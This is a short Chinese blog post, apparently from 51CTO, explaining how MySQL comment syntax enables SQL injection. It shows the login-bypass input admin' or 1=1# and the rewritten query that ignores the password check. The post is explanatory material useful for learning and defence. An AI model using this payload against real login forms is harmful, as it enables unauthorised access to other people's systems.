// 这里以MySQL为例子
select name,pass from tbAdmin where name='admin' and pass='123456'
输入:admin' or 1=1#
SQL变成下面这个样子:
select name,pass from tbAdmin where name='admin' or 1=1#' and pass='123456'
你会发现随便输入密码,都可以随便登陆了。。。
-----------------------------------------------------
select * from tbAdmin # 这是MySQL注释
select * from tbAdmin /* 这是MySQL注释 */
SQL注入之注释
原创
©著作权归作者所有:来自51CTO博客作者friendan的原创作品,请联系作者获取转载授权,否则将追究法律责任
提问和评论都可以,用心的回复会被更多人看到
评论
发布评论
相关文章
-
sql注入之union注入
联合查询注入利用的前提: 必须要有回显 联合查询过程: 判断是否存在注入点 判断是
sql注入 数据库 表名 单引号 -
SQL注入之ACCESS注入笔记
加油
表名 数据 单引号 -
SQL学习之SQL注入总结
Sql注入定义: 就是通过把sql命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行的sql命令的目的。 s
SQL SQL注入 数据库 数据 sql -
注释注入html